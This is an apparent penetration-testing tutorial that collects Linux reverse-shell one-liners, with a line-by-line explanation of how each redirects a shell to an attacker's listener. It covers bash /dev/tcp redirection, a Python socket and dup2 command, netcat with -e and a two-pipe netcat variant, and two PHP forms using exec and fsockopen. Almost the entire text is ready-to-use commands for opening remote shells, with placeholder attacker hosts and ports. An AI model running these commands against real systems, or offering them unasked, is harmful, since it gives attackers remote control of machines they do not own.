A reverse shell is often needed during a penetration test, so here is a summary of several ways to get a Linux reverse shell:
bash -i >& /dev/tcp/ip/port 0>&1
bash -i    Start bash locally in interactive mode.
>&    Output redirection: send both standard output and standard error to the file named next, i.e. to the remote end.
/dev/tcp/ip/port    Open a TCP connection to the other machine. This path does not exist in /dev: bash itself recognizes redirections to /dev/tcp/host/port (and /dev/udp/host/port) and opens a socket instead of a file, so the one-liner only works when the shell is really bash, not sh or dash.
0>&1    Redirect standard input to standard output, which at this point is already the socket to /dev/tcp/ip/port, i.e. the attacker's machine. Input and output are now both on the remote end: the shell reads commands from the attacker and sends results back over the same connection.
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
python -c    Execute the code that follows as a script (works on Python 2 and 3)
import os,socket,subprocess    Import the three modules os, socket and subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)    Create a TCP socket
s.connect(('ip',port))    Connect to the IP and port on which the attacker is listening
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2)    dup2() from the os module makes file descriptors 0, 1 and 2 (stdin, stdout, stderr) copies of the socket's descriptor
p=subprocess.call(['/bin/bash','-i'])    Start a child process running bash with -i, i.e. in interactive mode; it inherits the redirected descriptors, so its input and output go over the socket
nc -e /bin/bash ip port
-e    program to run once the connection is established; its standard input and output are attached to the connection.
After nc connects to the attacker, it runs the local shell (/bin/bash) over that connection, completing the reverse shell. Many netcat builds are compiled without -e precisely because of this.
If the installed nc has no -e option, the pipe character "|" can be used instead, but the attacker needs two terminals: one to type commands and one to see the results.
Target machine: nc ip1 81 | /bin/bash | nc ip2 82
Attacker machine: nc -lvvp 81 (terminal 1, commands are typed here) and nc -lvvp 82 (terminal 2, results appear here)
The pipe "|" feeds the output of the command on its left into the input of the command on its right:
whatever arrives on the connection to ip1:81 is passed to /bin/bash for execution, and bash's output goes out over the connection to ip2:82. ip1 and ip2 are normally the same attacker machine. Note that only standard output is piped, so bash's error messages are not sent back unless standard error is also redirected into the pipe.
php -r 'exec("/bin/bash -c \"bash -i >& /dev/tcp/127.0.0.1/4444 0>&1\"");'
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
The first form simply wraps the bash one-liner: exec() hands its command to /bin/sh, and since >& and /dev/tcp are bash features the command has to be run through bash -c (and bash must be installed). The second form opens the socket from PHP and then tells bash to use it as stdin, stdout and stderr via <&3 >&3 2>&3. The number 3 is an assumption: in the php CLI descriptors 0, 1 and 2 are already taken, so the newly opened socket normally lands on 3; if the process has other files open the socket gets a higher descriptor and the number has to be adjusted.
php -r runs the PHP code given on the command line (without <?php tags); php -f runs the given file.
exec() runs an external command through /bin/sh and returns the last line of its output.
fsockopen(hostname, port, &errno, &errstr, timeout) opens a network connection or a Unix domain socket connection:
hostname: the destination host, i.e. the IP the attacker is listening on;
port: the destination port, i.e. the port the attacker is listening on;
errno: variable that receives the system error number if the connection cannot be established;
errstr: variable that receives the corresponding error message;
timeout: how many seconds to wait for the connection attempt before giving up (it applies only to the connect, not to later reads and writes).
A socket is general purpose: it is not limited to carrying web pages. Chat tools, downloaders, FTP clients, almost anything that can be sent over the network can be built on one.
fsockopen is a fairly low-level call that sits directly on the operating system's socket layer. It returns a stream resource (a file pointer), not data: whatever is read from or written to it is the raw bytes on the wire, with no protocol parsing, which is exactly why a shell's descriptors can be pointed straight at it.